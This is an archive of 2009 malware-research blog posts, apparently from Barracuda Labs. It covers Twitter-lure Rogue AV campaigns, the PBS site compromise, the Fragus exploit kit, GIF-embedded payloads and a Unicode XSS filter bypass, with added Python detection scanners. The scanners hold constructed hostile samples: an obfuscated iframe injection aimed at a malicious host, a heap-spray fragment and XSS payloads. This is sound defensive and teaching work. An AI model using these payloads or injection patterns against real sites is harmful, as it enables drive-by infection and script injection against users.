Archive for the ‘Research’ Category

Twitter Trending Topics Used to Propagate Rogue AV

Friday, September 18th, 2009

Posted by: Barracuda Labs

Last night, a Purewire employee was directed to a Rogue AV website after clicking on a link in a tweet that matched a popular topic. Subsequent analysis uncovered an active Rogue AV propagation campaign that attempts to lure users to malicious websites via tweets that contain popular terms searched on Twitter.

The malicious tweets draw part of their word content from Twitter’s Trending Topics list; a screenshot of the list at the time of this writing is shown below.

Twitter Trending Topics

Searches for some of the above topics return malicious tweets like the ones in the following examples; the links in those tweets lead to

hxxp://securityland.cn/?uid=144&pid=3&ttl=31c48520c54

which acts as a traffic distribution system for a Rogue AV operation; the chain of redirections ends at one of the following Rogue AV distribution points:

All of the above sites serve javascript-based fake system scanners:

which attempt to compel the user to download Windows PC Defender, a brand of Rogue AV software. AV detections for the Rogue AV malware instance served are non-existent:

http://www.virustotal.com/analisis/9a155d62af5b43be29018f7d0f52875503c6d15a3c891cb5807ed123398889ca-1253323103

Users of the PWSS are protected from this campaign.


PBS Website Compromised, Used to Serve Exploits

Wednesday, September 16th, 2009

Posted by: Barracuda Labs

On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

A forensic analysis of this attack revealed that the user requested the following:

hxxp://www.pbs.org/parents/curiousgeorge

which in turn requested:

hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

instead of:

hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.

PBS Login Prompt

If correct credentials are not provided, dipsy.pbs.org serves an error page that looks normal:

… until you look under the hood. The end of the error page’s source:

contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

hxxp://qxfcuc.info/f.cgi?jzo

The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).
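The injected code described above is a pattern worth being able to spot without loading the page in a browser. As an added illustration (this is not Purewire's MJD engine and not code from the post), the following Python scans a page for document.write() calls, statically evaluates the unescape() and String.fromCharCode() pieces of their arguments, parses the markup they would emit, and reports any iframe, script or object that loads from a different site than the page it sits on. The error page and the %-escaped payload below are constructed for the example; the post does not show the actual obfuscation used on dipsy.pbs.org, and real kits add variable indirection and eval() that this static pass does not follow.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def js_unescape(s):
    """Decode what JavaScript's unescape() would: %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


# Pieces of a document.write() argument that can be evaluated without running the script:
# unescape("..."), String.fromCharCode(n, n, ...) and plain string literals. Variable
# indirection, eval() and arithmetic on code points (common in real kits) are not handled.
TOKEN = re.compile(
    r"unescape\s*\(\s*(['\"])(?P<esc>.*?)\1\s*\)"
    r"|String\.fromCharCode\s*\((?P<codes>[\d,\s]*)\)"
    r"|(?P<q>['\"])(?P<lit>.*?)(?P=q)",
    re.S,
)
DOC_WRITE = re.compile(r"document\.write(?:ln)?\s*\((.*?)\)\s*;", re.S)
SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def eval_write_argument(arg):
    """Concatenate the statically decodable parts of a document.write() argument."""
    parts = []
    for t in TOKEN.finditer(arg):
        if t.group("esc") is not None:
            parts.append(js_unescape(t.group("esc")))
        elif t.group("codes") is not None:
            parts.append("".join(chr(int(n)) for n in re.findall(r"\d+", t.group("codes"))))
        else:
            parts.append(t.group("lit"))
    return "".join(parts)


class LoadCollector(HTMLParser):
    """Collect the URLs of tags that pull remote content into the page."""

    LOADERS = {"iframe": "src", "script": "src", "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.loads = []

    def handle_starttag(self, tag, attrs):
        wanted = self.LOADERS.get(tag)
        for name, value in attrs:
            if name == wanted and value:
                self.loads.append((tag, value))


def same_site(host, page_host):
    """Crude registrable-domain comparison on the last two labels; enough for .org/.info hosts."""
    if not host:
        return False
    return host.split(".")[-2:] == page_host.split(".")[-2:]


def find_written_loads(page_html, page_host):
    """Return [(tag, url, offsite)] for every remote load emitted by document.write() calls."""
    found = []
    for script in SCRIPT.findall(page_html):
        for m in DOC_WRITE.finditer(script):
            collector = LoadCollector()
            collector.feed(eval_write_argument(m.group(1)))
            for tag, url in collector.loads:
                found.append((tag, url, not same_site(urlparse(url).hostname, page_host)))
    return found


# Constructed sample, not the real PBS page: a plausible HTTP 401 error page with one
# obfuscated document.write() appended at the end of the body.
SAMPLE_PAGE = """<html><head><title>401 Authorization Required</title></head>
<body><h1>Authorization Required</h1>
<p>This server could not verify that you are authorized to access the document requested.</p>
<script type="text/javascript">
document.write(unescape("%3Ciframe%20src%3D%22http%3A//qxfcuc.info/f.cgi%3Fjzo%22")
  + String.fromCharCode(32, 119, 105, 100, 116, 104, 61, 49)
  + unescape("%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E"));
</script>
</body></html>"""

if __name__ == "__main__":
    for tag, url, offsite in find_written_loads(SAMPLE_PAGE, "dipsy.pbs.org"):
        print(f"{tag:<7} {url}  {'OFF-SITE' if offsite else 'same site'}")
```

Run against the sample, the scanner recovers the hidden 1x1 iframe and reports qxfcuc.info as off-site for a page served from dipsy.pbs.org; a same-site load (www.pbs.org) would pass the check, which is the point of comparing against the page's own domain rather than flagging every document.write().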

The domain qxfcuc.info is part of a malware campaign that includes several tens of similar websites hosted on a handful of shared IP addresses. Most of these domains served similar exploit code, although a few (e.g., yyoqny.info) display a message suggesting that the criminal behind this campaign is compromising systems to build a botnet that he will likely lease out later. Translated from Russian, that message tells prospective lessees to “Send a message to ICQ #559156803; stats available under ststst02.”

Users of the PWSS are protected from this campaign.

Update, Sep 18, 2:49PM ET: PBS has notified Purewire that the malicious javascript has been removed from its site.


The Fragus Exploit Kit

Tuesday, August 25th, 2009

Posted by: Barracuda Labs

Recently, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious URLs backed by what was found to be Fragus, a new exploit kit that appeared in late July 2009. An example of a Fragus URL and a screenshot of its admin control panel login page are shown directly below.

hxxp://blt.kz/1/show.php?s=5015ba5606

Fragus Admin Control Panel Login

As with most modern exploit kits, Fragus serves not one, but a grab bag of exploits that attack the browser, ActiveX controls, and third-party plugins. Deobfuscating the javascript served from the above URL revealed the following function names (bodies omitted), each of which attempts to exploit one or more vulnerabilities:

directshow(): Performs heap spraying, then serves hxxp://blt.kz/1/directshow.php, which targets the Microsoft Video (DirectShow) ActiveX control vulnerability (a.k.a., MS09-032).

pdf(): Serves hxxp://blt.kz/1/pdf.php?eid=3, which targets Acrobat Reader vulnerabilities in util.printf, Collab.getIcon, and Collab.collectEmailInfo (a.k.a., CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659, respectively).

flash(): Serves hxxp://blt.kz/1/swf.php?eid=4, which targets the Adobe Flash Player integer overflow vulnerability (a.k.a., CVE-2007-0071).

aolwinamp(): Performs heap spraying, then attempts to exploit the AOL Radio AmpX (AOLMediaPlaybackControl) ActiveX control vulnerability (a.k.a., CVE-2007-6250).

snapshot(): Targets the Microsoft Access Snapshot Viewer ActiveX control vulnerability (a.k.a., MS08-041) in an attempt to have hxxp://blt.kz/1/load.php?e=6 executed.

spreadsheet(): Performs heap spraying, then attempts to exploit the Microsoft Office Web Components ActiveX control vulnerability (a.k.a., MS09-043).

ms09002(): Performs heap spraying, then attempts to exploit the Microsoft Internet Explorer 7 memory corruption vulnerability (a.k.a., MS09-002).

The above set of exploits prompts two observations about the continuing evolution of the web threat landscape. First, given that Fragus targets vulnerabilities in at least seven different software components, ranking one vulnerability as more or less exploited than another is increasingly at odds with how vulnerabilities are actually used. Modern exploit kits target any and all vulnerabilities that have a reasonable chance of compromising a system, and unfortunately, just one vulnerable, out-of-date software component is enough for that compromise to occur. Second, as one of the above vulnerabilities (MS09-043) is less than a month old, the time between the discovery of a vulnerability and its widespread use by criminals is shrinking. The creators of malware infrastructure now rapidly integrate recently-discovered vulnerabilities into do-it-yourself exploit kits, and security companies must be increasingly quick to respond.
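Four of the functions listed above begin by heap spraying. What that looks like in source, and how a scanner can flag it without executing the script, is shown by the following added Python example (this is not Fragus code and not Purewire's engine). The two JavaScript fragments it scans are constructed in the shape the post describes: the "shellcode" literal is a meaningless stub, and the CLSID is that of the Microsoft Video ActiveX control kill-bitted by MS09-032, included only so the report has something to extract. The thresholds (a sled of at least two repeated words, a doubling loop that grows a string to at least 64 KiB) are assumptions, not a published signature.

```python
import re
from collections import Counter

UNESCAPE_LITERAL = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.S)
# while (x.length < N) x += x;   grows a string geometrically until it is N characters long
DOUBLING_LOOP = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)\s*\1\s*\+=\s*\1\b"
)
# for (...) arr[i] = ...;   copies the grown block into many separate heap allocations
FILL_LOOP = re.compile(r"for\s*\([^)]*\)\s*\{?\s*(\w+)\s*\[\s*\w+\s*\]\s*=")
CLSID = re.compile(r"clsid:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})")


def sled_words(literal):
    """16-bit words of a %uXXXX-encoded literal (anything not %u-encoded is ignored)."""
    return [int(w, 16) for w in re.findall(r"%u([0-9a-fA-F]{4})", literal)]


def is_sled(words, min_words=2, ratio=0.75):
    """A sled is a literal made almost entirely of one repeated word (0x9090, 0x0c0c, ...)."""
    if len(words) < min_words:
        return False
    _, count = Counter(words).most_common(1)[0]
    return count / len(words) >= ratio


def js_int(text):
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def heap_spray_report(js):
    """Static indicators of a heap spray in a JavaScript source; nothing is executed."""
    report = {
        "sled_literals": [m.group(2) for m in UNESCAPE_LITERAL.finditer(js)
                          if is_sled(sled_words(m.group(2)))],
        "doubling_loops": [(m.group(1), js_int(m.group(2))) for m in DOUBLING_LOOP.finditer(js)],
        "array_fills": FILL_LOOP.findall(js),
        "clsids": CLSID.findall(js),
    }
    # Verdict: a NOP-like sled, grown by doubling to at least 64 KiB, copied into an array.
    report["heap_spray"] = (
        bool(report["sled_literals"])
        and any(size >= 0x10000 for _, size in report["doubling_loops"])
        and bool(report["array_fills"])
    )
    return report


# Constructed sample in the shape of a spray-then-exploit function; not Fragus code.
# The "shellcode" literal is a meaningless stub.
SPRAY_SAMPLE = r"""
function directshow() {
  var shellcode = unescape("%u9090%u9090%uE8FC%u0000%u8900%u31E5");
  var nops = unescape("%u0c0c%u0c0c");
  while (nops.length < 0x40000) nops += nops;
  var block = nops.substring(0, 0x40000 - shellcode.length) + shellcode;
  var heap = new Array();
  for (var i = 0; i < 200; i++) heap[i] = block + "";
  var o = document.createElement("object");
  o.setAttribute("classid", "clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF");
}
"""

# Constructed benign script: it also calls unescape() and fills an array, but has no sled
# and no doubling loop, so it must not be flagged.
BENIGN_SAMPLE = r"""
var notice = unescape("%u00A9%202009");
var items = new Array();
for (var i = 0; i < 3; i++) items[i] = "item " + i;
"""

if __name__ == "__main__":
    for label, src in (("spray", SPRAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, heap_spray_report(src))
```

The verdict deliberately requires all three indicators together; unescape() alone or an array-fill loop alone is ordinary web code, which is why the benign sample scores nothing even though it matches two of the individual regexes.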

Users of the PWSS are protected from this threat.


Erin Andrews Used to Propagate Malware via Twitter

Tuesday, July 21st, 2009

Posted by: Barracuda Labs

Earlier today, malicious links that claimed to offer videos and pictures of Erin Andrews began appearing on Twitter. Search terms leading to these malicious tweets include the following:

erin andrews peephole video link rapidshare
espn reporter erin andrews
erin andrews peephole pictures
erin andrews video torrent
erin andrews hot pics

The malicious tweets were (automatically) created using numerous accounts and the Twitter API; the links have been shortened using bit.ly, as shown in the following screenshot.

If the user clicks on one of the links, the following series of redirections occurs:

hxxp://bit.ly/1bkUV9
-> hxxp://xombag.com/video/go.php?sid=2&name=erin+andrews+hot+pics&theme=trends&hostingtype=twitter

-> hxxp://sunny-tube-world.com/xplays.php?id=40014&name=erin+andrews+hot+pics&theme=trends&hostingtype=twitter

The name parameter in the above URLs corresponds to the text of the tweet that started the chain, which allows the operators of the propagation campaign to determine which combinations of terms (listed at the beginning of this post) made the best lures. The series of redirects ends at the page shown in the screenshot below, which offers a fake video that the user will likely assume is of Erin Andrews.

The fake video, served via hxxp://newfileexe.com/onlinemovies.40014.exe, is a trojan downloader, a small piece of malware that (when executed) will download and execute other malicious programs. AV detections for this instance are practically non-existent:

http://www.virustotal.com/analisis/f9e4218db68f661751ffe2ced790ebf30e55e8bb7a39fc46e47831453d214e8f-1248216878

One of the most fascinating parts of this campaign is how the trojan downloader retrieves additional malware. Instead of downloading executables, the downloader fetches the following image files:

hxxp://isyouimageshere.com/item/b6bc3e14a0639460413e87d5c4d82e8267c6a661217f2f1530b599dd6f76ee1d23103cd88fd83fc10/b4a0d091c46/titem.gif

hxxp://imgesinstudioonline.com/perce/861c5e6420337400215e97e5c4d81e42b7462631f1af8f65702579fdbff64e4d03a0ac38ef284f117/d40040b1148/qwerce.gif

hxxp://yourimagesstudio.com/werber/d4300051f41/217.gif

Hidden inside these viewable GIF files (as comment blocks) are encrypted malware executables. After retrieving the files, the downloader extracts the comments, transforms them back into malware, and executes them.
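The following Python, added here as an illustration rather than taken from the downloader, shows how a GIF can stay perfectly viewable while carrying a payload in its comment extension (block 0x21 0xFE, split into data sub-blocks of at most 255 bytes), and how an analyst can walk the block structure to carve the comments back out. The post does not say how the executables are encrypted, so the example assumes a repeating-key XOR; the key, the GIMP-style comment and the MZ-prefixed "executable" are all constructed stand-ins, not malware.

```python
import struct

GIF_COMMENT = 0xFE  # extension label of a comment block (0x21 0xFE ...)


def build_gif(comments):
    """A valid 1x1 GIF89a that carries each byte string in comments as a comment extension."""
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)  # 2-colour global table
    palette = b"\x00\x00\x00\xff\xff\xff"
    out = bytearray(header + palette)
    for comment in comments:
        out += b"\x21" + bytes([GIF_COMMENT])
        for i in range(0, len(comment), 255):      # data sub-blocks hold at most 255 bytes
            chunk = comment[i:i + 255]
            out += bytes([len(chunk)]) + chunk
        out += b"\x00"                              # block terminator
    # Image descriptor, LZW minimum code size, one data sub-block, trailer.
    out += b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02" + b"\x02\x44\x01\x00" + b"\x3B"
    return bytes(out)


def _read_subblocks(data, pos):
    """Concatenate GIF data sub-blocks starting at pos; return (payload, pos after terminator)."""
    out = bytearray()
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        out += data[pos:pos + n]
        pos += n


def extract_gif_comments(data):
    """Walk the GIF block structure and return the payload of every comment extension."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    pos = 13                                        # header + logical screen descriptor
    if packed & 0x80:
        pos += 3 * (2 ** ((packed & 7) + 1))        # global colour table
    comments = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                           # trailer
            break
        if block == 0x21:                           # extension: label, then sub-blocks
            label = data[pos]
            pos += 1
            body, pos = _read_subblocks(data, pos)
            if label == GIF_COMMENT:
                comments.append(body)
        elif block == 0x2C:                         # image descriptor
            local_packed = data[pos + 8]
            pos += 9
            if local_packed & 0x80:
                pos += 3 * (2 ** ((local_packed & 7) + 1))
            pos += 1                                # LZW minimum code size
            _, pos = _read_subblocks(data, pos)     # image data
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return comments


def xor_bytes(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def carve_executables(gif, key):
    """Decode every comment with the assumed XOR key and keep the ones that become a PE image."""
    return [plain for plain in (xor_bytes(c, key) for c in extract_gif_comments(gif))
            if plain[:2] == b"MZ"]


# Constructed data: the key is an assumption (the post does not give the scheme) and the
# "executable" is an MZ-prefixed stand-in long enough to span several sub-blocks.
KEY = b"\x5a\x13\xc7"
FAKE_EXE = b"MZ" + bytes(range(256)) * 3
SAMPLE_GIF = build_gif([b"Created with GIMP", xor_bytes(FAKE_EXE, KEY)])

if __name__ == "__main__":
    for i, comment in enumerate(extract_gif_comments(SAMPLE_GIF)):
        print(f"comment {i}: {len(comment)} bytes, starts {comment[:8]!r}")
    print("carved:", [len(x) for x in carve_executables(SAMPLE_GIF, KEY)])
```

Because the walker honours the sub-block framing rather than searching for a magic string, it also works when the payload is split across many 255-byte chunks or sits behind graphic-control and application extensions; an image viewer decodes the same file without complaint, which is exactly why the technique gets GIF downloads past controls that only look at the file type.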

Users of the PWSS are protected from this threat.


The Security Impact of Windows 7 Adoption

Sunday, July 19th, 2009

Posted by: Barracuda Labs

With the release of Windows 7 only months away, it is worthwhile to begin considering its expected impact on security. This post reasons about a few of the changes the new operating system’s (eventual) widespread adoption will bring.

Application vulnerabilities will be harder to weaponize into working exploits. While Windows memory protections such as DEP and ASLR have been around for several years, ubiquitous applications (IE8, Firefox 3) and their corresponding plugins (Flash, Acrobat Reader, and QuickTime) are now using them. When these protections are combined with recent fixes by Microsoft that address the few corner cases in which they were disabled, the result is that often, even if a vulnerability exists, successfully exploiting it may not be possible. As an example, the Firefox 3.5 just-in-time compiler vulnerability has been reported not to work under Windows Vista or Windows 7. In the long term, the adoption of these technologies may cause criminals to shift their focus from attacks that are technical in nature (i.e., attacking the browser or its plugins) to those that are social in nature (as used by Rogue AV).

Hardware-assisted rootkits such as Blue Pill will be difficult to deploy. Rootkits that use hardware virtualization operate outside of the host operating system by first assuming a special privilege level, called VMX root mode. Given that Windows 7 implements Windows XP Mode (XPM) using hardware virtualization extensions (and therefore runs in VMX root mode), hardware-assisted rootkit installation becomes considerably more complex. Such a rootkit would need to overcome significant technical hurdles to avoid crashing the OS or alerting the user, which include bypassing OS protection mechanisms, saving XPM guest state, cleanly disabling VMX root mode in the host, and providing emulation services so that XPM applications will continue functioning.

Malware will face significant challenges in evading modern forms of dynamic analysis. Next-generation malware analysis approaches (e.g., Ether) introspect the behavior of malicious software through the use of hardware virtualization extensions. As it is very difficult to reliably detect the presence of an external malware analyzer that resides inside such a hypervisor, some criminals have instead responded by creating malware that refuses to run if it detects the presence of hardware-assisted virtualization. However, given Windows 7’s use of hardware-assisted virtualization in the implementation of XPM, malware that employs this crude form of detection will preclude itself from the very end users it intended to target.

In summary, the release of Windows 7 looks to be an all-around win for security; its adoption will benefit both end users and security professionals.


Waledac Celebrates Independence Day

Friday, July 3rd, 2009

Posted by: Barracuda Labs

After months of inactivity, Waledac has begun a new propagation email campaign. Messages in this run all relate to the July 4th holiday; an example is shown below.

From: Elmer Curry < tonya.galati@nextiraone.fr >
Date: Sat, 4 Jul 2009 04:37:49
Subject: Happy Birthday, America!
To: < redacted >@orange.fr

Well done 4th! hxxp://axkgi.fireworksnetwork.com/

Similar to Storm’s 2008 July 4th email campaign, clicking on the above link will take the user to a fake YouTube page claiming to offer a video of an expensive fireworks display:

The “video” is actually Waledac malware, which will infect the user’s system if they attempt to “view” it. AV detections for these instances are poor:

http://www.virustotal.com/analisis/7e288c3f5a0d3adee8b50d249fb3a656e0ca3736437a16abf4abbbf54af73931-1246683971

Users of the PWSS are protected from this campaign.


A Fourth of July Portent

Tuesday, June 30th, 2009

Posted by: Barracuda Labs

While perusing my spam folder today, I came across the following run-of-the-mill pharmacy email:

From: Hilda McIntyre < hmcintyre_qm@evd.nl >
Date: Tue, Jun 30, 2009 at 8:20 AM
Subject: Unbeatable Pharmacy Offers!
To: < redacted >@gmail.com

An Incredible Canadian Pharmacy is available at your Fingertips!
*No~Doctor~Needed*! Browse our Site Today! -> hxxp://skincarry.com

skincarry.com currently resolves to IPs (e.g., 61.191.191.241) that map back to hundreds of other domains (e.g., *.fnueukej.cn, *.fbaiuaao.cn) hosting the same fake Canadian pharmacy website; the domains exist in part to help spammers get their solicitations past email filters. Not surprisingly, no part of the order process on this site uses SSL (so credit card information, etc. is sent from the browser as unencrypted plain text). However, the wholly fraudulent nature of the site and the operators behind it is not what I wanted to talk about today.

At the top of the site is a picture of fireworks, with text underneath that offers preemptive congratulations on the upcoming July 4th holiday.

July 4th Banner

While the above banner is a slightly boring twist on an all-too-familiar social engineering tactic, its presence should serve as a warning. For the past several years, most major holidays in the United States have been accompanied by waves of malicious email that leverage a given event’s popularity to compromise the systems of unsuspecting users. Independence Day is no exception: past uses have included campaigns by botnets as ubiquitous as Storm. Users should be especially diligent when handling holiday-related emails this weekend, as invariably, some will receive messages whose sole purpose is to place malware on their computer.


Fake Twitter Invitation Campaign Spreads Malware

Thursday, June 18th, 2009

Posted by: Barracuda Labs

As Twitter’s popularity continues to increase, so does use of its name as a way to spread malware. Late last week a Purewire employee received the following email, which presented itself as an invitation to join Twitter.

From: invitations@twitter.com [mailto:invitations@twitter.com]
Sent: Friday, June 12, 2009 1:05 PM
To: < redacted >@purewire.com
Subject: Your friend invited you to twitter!

Your friend invited you to twitter!

Twitter is a service for friends, family, and co-workers to communicate and stay connected through the exchange of quick, frequent answers to one simple question: What are you doing?

To join or to see who invited you, check the attachment.


The attachment accompanying the email, Invitation Card.zip, contained a file named “document.doc     (many spaces)     .exe”. Even if the user’s system were configured to show extensions for known file types, the file (after being extracted from the archive) would still have the following deceptive appearance:


Invitation Card

As with previous campaigns of this nature, if the user attempts to “view” the “invitation card”, they will infect their system with malware. To avoid becoming victims of these multi-faceted social engineering attacks, users should be especially diligent when handling attachments claiming to be ecards, invoices, invitations, etc.
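A mail gateway or sandbox can catch this particular trick before a user ever sees the icon. The following Python check is an added example (not from the post): it unpacks an archive in memory and flags members whose names use the tactics described above, namely a true executable extension, runs of whitespace that push that extension out of view, and a document-looking inner extension. It also flags a Unicode right-to-left override character, a related filename trick the post does not mention. The archive, the member names and the file contents are all constructed for the example.

```python
import io
import re
import zipfile

EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "jse", "wsf", "hta", "cpl", "msi"}
DOCUMENT_EXTS = {"doc", "docx", "xls", "pdf", "txt", "rtf", "jpg", "gif", "png", "htm", "html"}
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE: reverses how the tail of a name is displayed


def analyze_name(name):
    """Return (real_extension, reasons) for one archive member name."""
    base = name.rsplit("/", 1)[-1]
    stem, _, ext = base.rpartition(".")      # the OS uses the text after the LAST dot
    ext = ext.lower()
    reasons = []
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"real extension is .{ext} (executable)")
    if stem != stem.rstrip() or re.search(r"\s{2,}", base):
        reasons.append("whitespace padding pushes the real extension out of view")
    inner = stem.rstrip().rpartition(".")[2].lower()
    if inner in DOCUMENT_EXTS:
        reasons.append(f"double extension: displays as a .{inner} file")
    if RLO in base:
        reasons.append("right-to-left override character in name")
    return ext, reasons


def scan_zip_bytes(data):
    """Flag archive members whose names are deceptive; returns a list of findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext, reasons = analyze_name(info.filename)
            if reasons:
                findings.append({"name": info.filename, "extension": ext, "reasons": reasons})
    return findings


# Constructed archive in the shape of "Invitation Card.zip": one deceptive member, one benign.
DECEPTIVE_NAME = "document.doc" + " " * 60 + ".exe"


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(DECEPTIVE_NAME, b"MZ stand-in, not an executable")
        zf.writestr("readme.txt", b"plain text")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip_bytes(build_sample_zip()):
        print(repr(f["name"]), "->", f["extension"], "|", "; ".join(f["reasons"]))
```

Checking the name alone is deliberately cheap; it runs before any content inspection and does not depend on AV signatures, which the post notes were absent for these samples.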


Twitter’s Dirty Little Secret

Monday, June 8th, 2009

Posted by: Barracuda Labs

Today, we officially launched TweetGrade™ (http://tweetgrade.com) — a free, online ranking system for Twitter users. TweetGrade provides a quantitative assessment of a user’s reach and influence in the Twitter community, and it helps promote safety and establish order in an increasingly popular social networking environment.

To create the intelligence that drives TweetGrade, we initially crawled more than 7 million Twitter user accounts and a sample of each account’s corresponding tweets. Then, we analyzed this data along a number of dimensions, including the frequency and content of tweets, user-to-user interactions, and each account’s overall activity level. Based on this analysis, we made a number of interesting observations about Twitter.

First, a large percentage of Twitter users abandon their accounts almost immediately after they are created:

  • 40% of Twitter users have not tweeted since their first day on Twitter (i.e., the account was most likely created and subsequently forgotten about).
  • 25% of the users are not following anyone; more than 50% of the users are following less than 5 people, and 2/3 of the users are following less than 10 people. The figure below reiterates these numbers with a cumulative distribution graph for the Twitter population’s following habits.

Twitter population’s following counts

Second, Twitter is being used as a mass medium for receiving information as opposed to being used to interact with others. Basically, Twitter is more similar to an RSS feed than an email or IM system:

  • More than 1/3 of Twitter users do not have any tweets, and almost 80% of the users have less than 10 tweets. The cumulative distribution graph for the Twitter population’s tweet counts is shown below.

Twitter population’s tweet counts

  • 30% of the users do not have any followers; 70% of the users have less than 5 followers, and 80% of the users have less than 10 followers. These findings are clearly shown in the following cumulative distribution graph for the Twitter population’s follower counts.

Twitter population’s follower counts

  • 50% of the users are following more people than they have as followers, and another 30% of the users are following the same number of people that are following them.

TweetGrade evaluates Twitter users based on their interactions in the Twitter community.  Users receive a simple letter grade that ranges from an ‘F’ to an ‘A+’ to represent their reputation on Twitter, and users can easily share these grades with the community.  In addition to promoting high-quality Twitter accounts, TweetGrades can also be used to identify malicious accounts (e.g., spammers) and abandoned accounts.  The overarching goal of TweetGrade is to help Twitter users make informed decisions about other Twitter users.


Unicode Encoding for Bypassing XSS Filters

Friday, June 5th, 2009

Posted by: Barracuda Labs

Unicode encoding-based filter evasions have been around for years, and we thought web developers would have written filters to cover them all. However, it seems that is not true. The new round comes from Arian Evans and Jeremiah Grossman testing the Unicode-encoded left (%u00AB) and right (%u00BB) angle quotation marks for getting around XSS filters. They hinted at it two years ago but did not get a chance to actually test it until now (nobody else did either, as there is no mention of it on the XSS cheat sheet).

According to their post on the webappsec mailing list, the left and right angle quotation marks are sometimes translated into ‘<’ and ‘>’, respectively, which lets them slip past filters that only look for the ASCII characters. This allows inclusion of arbitrary HTML content on a web page, and hence JavaScript too (e.g., %u00ABscript%u00BB). They tested around 300 to 1000 websites and found about 44 of them vulnerable to this evasion technique, with 200 locations and 1000+ input variables to attack. What is notable is that they only counted sites where this was the only way to evade the filter, so there may be many more where this would have worked alongside other techniques.
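The following Python, added to illustrate the filter-ordering problem the post describes and not taken from it, models the vulnerable pipeline: the filter strips < and > from the raw input, a later conversion step best-fits « (U+00AB) and » (U+00BB) to ASCII, and the result is echoed unencoded. The best-fit table is an assumption about what such a conversion step does; the model also folds fullwidth ＜ and ＞ via NFKC normalization, which goes beyond the two characters in the post but fails the same way. The hardened version canonicalizes before filtering and HTML-encodes at the point of output.

```python
import html
import re
import unicodedata

# Assumed best-fit table for a downstream conversion to a narrow charset: the angle
# quotation marks (U+00AB, U+00BB) fold to ASCII angle brackets. Fullwidth forms
# (U+FF1C, U+FF1E) are folded by NFKC normalization below.
BEST_FIT = {"\u00ab": "<", "\u00bb": ">"}


def percent_u_decode(s):
    """Decode %uXXXX and %XX sequences the way the server's parameter parser might."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def best_fit_ascii(s):
    """Model of a lossy conversion step: NFKC folding, then the best-fit table."""
    return "".join(BEST_FIT.get(ch, ch) for ch in unicodedata.normalize("NFKC", s))


def strip_angle_brackets(s):
    return s.replace("<", "").replace(">", "")


def vulnerable_render(raw):
    """Filter the input as received, convert afterwards, echo without encoding."""
    filtered = strip_angle_brackets(percent_u_decode(raw))  # sees only U+00AB/U+00BB, passes them
    stored = best_fit_ascii(filtered)                        # conversion turns them into < >
    return stored                                            # and the page receives live markup


def hardened_render(raw):
    """Canonicalize before filtering, and HTML-encode at the point of output regardless."""
    canonical = best_fit_ascii(percent_u_decode(raw))
    return html.escape(strip_angle_brackets(canonical), quote=True)


def is_live_markup(rendered):
    """True if the output contains a tag a browser would interpret."""
    return re.search(r"<\s*/?\s*[a-zA-Z]", rendered) is not None


PAYLOADS = [
    "%u00ABscript%u00BBalert(1)%u00AB/script%u00BB",  # the probe from the post
    "%uFF1Cimg src=x onerror=alert(1)%uFF1E",         # fullwidth brackets, folded by NFKC
    "<b>plain</b>",                                   # the case the filter was written for
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r}\n  vulnerable: {vulnerable_render(p)!r}\n  hardened:   {hardened_render(p)!r}")
```

The fix is not a longer blacklist: any filter that inspects a representation different from the one the browser finally receives can be bypassed by whatever transformation sits between the two, so canonicalize first and encode on output.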

Lesson learned: security is a state at a given point in time. Once achieved, it does not hold forever. You need to constantly evaluate and update it to counter new attacks.
